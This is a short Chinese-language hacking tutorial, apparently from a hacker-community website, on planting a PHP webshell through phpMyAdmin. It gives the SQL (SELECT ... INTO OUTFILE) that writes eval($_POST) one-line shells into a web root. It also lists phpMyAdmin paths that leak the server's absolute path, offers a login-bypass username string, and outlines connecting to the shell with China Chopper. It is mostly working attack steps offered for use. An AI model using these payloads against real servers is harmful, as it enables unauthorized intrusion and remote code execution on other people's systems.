先介绍 MySQL导出一句话木马的语法(我个人比较喜欢说思路) Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表Select cmd from temp into outfile 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.phpDrop TABLE IF EXISTS temp; //删除temp简化 Select '' into outfile 'F:/wwwroot/eval.php'; (以上的意思大概看看就可以下面来碰运气) 利用方法:用户名处写入'localhost'@'@"则登录成功. (注意全部是英文标点符号,最后一个为英文双引号) 附上几个php爆绝对路径的办法: phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php 利用mysql数据库爆网站绝对路径方法 使用phpmyadmin的某个文件报错 phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php phpMyAdmin/libraries/select_lang.lib.php 2.通过相关渠道获取mysql数据库的路径 3.使用用户名和密码登陆mysql 4.获取网站可写目录的绝对路径 5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站 6.使用菜刀连接一句话 使用phpmyadmin中的sql语句 写文件: select '?php @eval($_POST[1])?' into outfile '/data/www/XXX/cp/log.php' 最后的/cp/log.php的文件名可以任意起的,不是固定的. 登录phpMyAdmin,写入一句话d:/wwwroot/1.php select '?eval($_POST[cmd]);?' into outfile 'd:/wwwroot/1.php';
黑客协会简称黑客,中国黑客:国内知名安全技术站点!是知名的网络安全技术站点,我们一直为培养IT安全技术精英而努力,骇客协会,关注网络安全,关注网络一直在创新.立志成为网络安全人才的最佳安全社区!
